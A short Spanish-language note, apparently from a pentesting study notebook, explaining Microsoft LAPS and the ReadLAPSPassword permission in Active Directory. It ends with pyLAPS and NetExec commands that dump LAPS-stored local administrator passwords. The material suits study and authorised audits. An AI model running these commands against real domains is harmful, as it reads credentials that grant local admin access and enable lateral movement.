LAPS (Local Administrator Password Solution)
¿Qué es LAPS?
LAPS significa Local Administrator Password Solution. Es una solución de Microsoft para manejar automáticamente las contraseñas del usuario administrador local (Administrador) en máquinas que están unidas a un dominio.
¿Para qué sirve?
- Imagina que tenés 100 PCs con la misma contraseña para el usuario
Administrador. Si alguien obtiene esa pass, puede moverse por toda la red fácilmente (movimiento lateral). - Con LAPS, cada máquina tiene una contraseña diferente para el administrador local, y esas contraseñas se guardan cifradas en el Active Directory.
- Solo usuarios autorizados pueden leer esas contraseñas.
¿Cómo funciona?
- Cada máquina rota la contraseña local del administrador cada X días (por política).
- La nueva contraseña se guarda en un atributo del objeto de equipo en Active Directory (por ej.,
ms-Mcs-AdmPwden LAPS clásico, omsLAPS-Passworden LAPS nuevo). - Solo usuarios o grupos con permiso pueden leer esa contraseña.
¿Qué es ReadLAPSPassword?
Este es un permiso de Active Directory que le da a un usuario o grupo la capacidad de leer la contraseña del admin local almacenada por LAPS en una máquina específica.
¿Por qué es importante?
Tener este permiso = acceso local como admin a esa máquina.
Referencia: https://www.thehacker.recipes/ad/movement/dacl/readlapspassword
pyLAPS.py --action get -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --dc-ip "$DC_IP"
# Comando por defecto
nxc ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --module laps
# El filtro COMPUTADORA puede ser el nombre o un comodín (por ejemplo, WIN-S10, WIN-*, etc. Valor predeterminado: *)
nxc ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --module laps -O computer="target-*"
